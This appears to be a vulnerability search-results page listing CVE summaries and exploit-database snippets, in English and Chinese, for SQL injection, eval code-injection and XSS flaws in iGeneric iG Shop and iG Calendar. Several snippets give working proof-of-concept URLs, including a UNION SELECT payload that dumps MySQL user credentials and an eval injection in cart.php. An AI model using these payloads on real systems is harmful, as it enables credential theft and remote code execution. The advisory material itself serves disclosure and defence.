169 matches found
CVE-2007-0130
CVE-2007-0130 describes a SQL injection in the web front-end of iGeneric iG Calendar 1.0, specifically in the file or function handling the id parameter of user.php. The vulnerability enables remote attackers to execute arbitrary SQL commands by supplying crafted input for id, leading to potentia...
CVE-2007-0132
SQL injection vulnerability in compareproduct.php in iGeneric iG Shop 1.4 allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2007-0134
Multiple eval injection vulnerabilities in iGeneric iG Shop 1.0 allow remote attackers to execute arbitrary code via the action parameter, which is supplied to an eval function call in 1 cart.php and 2 page.php. NOTE: a later report and CVE analysis indicate that the vulnerability is present in 1...
CVE-2007-0134
The CVE-2007-0134 issue affects iGeneric iG Shop, originally version 1.0. It enables remote code execution via eval in the action parameter passed to eval call sites in cart.php and page.php. A later report notes the vulnerability is also present in version 1.4. The connected sources consistently...
CVE-2007-0132
The CVE-2007-0132 entry concerns a SQL injection in the iGeneric iG Shop 1.4 application, specifically in compare_product.php. The underlying flaw allows an attacker to manipulate the id parameter to execute arbitrary SQL commands on the backend database. Affected component is the compare_product...
CVE-2007-0133
The CVE-2007-0133 entry describes multiple SQL injection vulnerabilities in display_review.php for iGeneric iG Shop
CVE-2007-0130
SQL injection vulnerability in user.php in iGeneric iG Calendar 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter...
IGeneric IG Shop SQL注入漏洞
IGeneric IG Shop是一款基于PHP的WEB应用程序。 IGeneric IG Shop不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。 问题是'compareproduct.php'脚本对用户提交的'id'参数缺少过滤,提交恶意脚本代码作为参数数据,可导致获得敏感信息。 iGeneric iG Shop 1.0 目前没有解决方案提供: http://www.igeneric.co.uk/displayresources/resource1.html...
iGeneric iG Calendar USER.PHP SQL注入漏洞
iGeneric iG Calendar是一款基于PHP的WEB应用程序。 iGeneric iG Calendar不正确过滤用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。 问题是'USER.PHP'脚本对用户提交的'id'参数缺少过滤,提交恶意脚本代码作为参数数据,可导致获得敏感信息。 iGeneric iG Calendar 1.0 目前没有解决方案提供: http://www.igeneric.co.uk/displayresources/resource3.html...
igcal10-sql.txt
SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT FROM users WHERE id='.$id; Should have used...
iG Shop 1.0 (eval/sql injection) Multiple Remote Vulnerabilities
No description provided by source. "If eval is the answer, then you are asking the wrong question." --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/igshop/cart.php?action=;phpinfo;// ./cart.php line 692: eval "cart$action;";...
iG Calendar 1.0 - 'user.php?id' SQL Injection
SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT FROM users WHERE id='.$id; Should have used...
ig shop 1.0 - Code Execution / SQL Injection
"If eval is the answer, then you are asking the wrong question." --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/igshop/cart.php?action=;phpinfo;// ./cart.php line 692: eval "cart$action;"; http://127.0.0.1/igshop/page.php?action=;phpinfo;//...
SQL Injection in ig-Calendar
SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=99920union20select201,User,Password,Host,Filepriv,020from20mysql.user ./user.php line 52: $query = 'SELECT FROM users WHERE id='.$id; Should have used quot...
ig shop 1.0 - Code Execution SQL Injection
ig shop 1.0 - Code Execution SQL Injection "If eval is the answer, then you are asking the wrong question." --Unknowen ig-shop suffers from two eval's that can be controlled by an attacker: http://127.0.0.1/igshop/cart.php?action=;phpinfo;// ./cart.php line 692: eval "cart$action;";...
iG Calendar 1.0 - user.php?id SQL Injection
iG Calendar 1.0 - user.php?id SQL Injection SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT...
iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability
No description provided by source. SQL Injection in ig-Calendar. This works regardless of magicquotesgpc! Dumps mysql login informaion: http://127.0.0.1/ig-calendar/user.php?id=999%20union%20select%201,User,Password,Host,Filepriv,0%20from%20mysql.user ./user.php line 52: $query = 'SELECT FROM use...
iG Calendar 1.0 (user.php id variable) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ========================================================================= iG Calendar 1.0 user.php id variable Remote SQL Injection Vulnerability ========================================================================= SQL Injection in...
CVE-2006-5631
Cross-site scripting XSS vulnerability in changepass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via arbitrary query strings when the action parameter is not "1", as demonstrated using script in the action parameter, a different vulnerability than CVE-2006-56...
CVE-2006-5632
Cross-site scripting XSS vulnerability in changepass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-5631. NOTE: the provenance of this information is unknown; the details are obtained solely from thir...